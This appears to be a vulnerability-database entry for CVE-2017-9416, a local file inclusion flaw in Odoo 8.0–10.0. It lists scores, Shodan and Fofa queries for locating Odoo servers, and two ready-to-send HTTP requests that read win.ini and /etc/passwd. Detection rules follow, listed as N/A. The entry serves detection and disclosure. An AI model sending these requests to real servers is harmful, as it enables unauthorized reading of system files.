🔙 목록으로 돌아가기

CVE-2017-9416: Odoo 8.0/9.0/10.0 - Local File Inclusion

TitleOdoo 8.0/9.0/10.0 - Local File Inclusion
AuthorCo5mos
SeverityMedium
ImpactAllows an attacker to read arbitrary files on the server.
RemediationUpgrade to a patched version of Odoo or apply the necessary security patches.
CVSS Score6.5
EPSS Score0.50415
CVE IDCVE-2017-9416
CWE IDCWE-22
Shodan Querycpe:"cpe:2.3:a:odoo:odoo"http.title:"odoo"
Fofa Querytitle="odoo"
Tags cve2017 cve odoo lfi vuln

🔍 Vulnerability Description

Odoo 8.0, 9.0, and 10.0 are susceptible to local file inclusion via tools.file_open. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.

🌐 HTTP Request

GET /base_import/static/c:/windows/win.ini HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
GET /base_import/static/etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2017/CVE-2017-9416.yaml

🦈 Packet Capture: ⬇️ Download cve-2017-9416.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A